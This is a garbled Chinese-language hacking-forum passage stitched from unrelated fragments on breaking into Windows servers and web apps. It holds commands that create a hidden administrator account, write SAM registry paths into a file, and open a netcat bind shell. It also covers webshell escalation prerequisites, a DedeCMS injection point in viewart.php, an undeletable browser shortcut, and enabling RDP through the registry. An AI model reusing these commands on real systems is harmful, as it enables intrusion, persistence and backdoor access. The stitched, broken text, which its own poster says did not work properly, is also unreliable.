这种编辑器相信大家都碰上过，后台没有数据库备份，也没有什么可以直接上传webshell的地方，简陋到只有一个editor的界面。简单说下利用的方法吧。点击图片上传后会出现上传页面，地址为

net user admins$ 1234567 /add
net localgroup administrators admins$ /add
Echo HKEY_LOCAL_MACHINE\SAM [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1] >>c:/tem.ini
...

nc -l -p 1234 -t -e cmd目录

这片文章是在网上找的！我试了哈感觉不对

虽然是低权限的，能做的事和WebShell上的差不多，不过使用起来还是要方便很多。

前提：
1.能用WebShell运行cmd命令。
方法有很多，首先是WScript.Shell，如果被改名或者被删了，就找可运行目录上传cmd.exe。

2.上传nc。可以跟cmd.exe上传到同一目录。
...

以现在的DEDECMS不可能出现的一个漏洞，重STOP群传出的..之后去拿shell到修复漏洞..$conn变量没有过滤！漏洞文件:php/viewart.php

如何在桌面上建立一个无法删除的快捷方式图标,,目的比较简单,就是建立一个:Internet Explorer图标,让他打开指定的网址..同时又把其右键的删除及Delete方式无效!

开启windows的3389端口的讨论网上很多，大多数是通过修改Termservice服务对应注册表项实现的，而且对于xp、2003方法不同，且大多数情况需要重启。其实组策略可以直接开启远程桌面的监听端口(前提:termservice服务已经启动)，只需修改注册表一个地方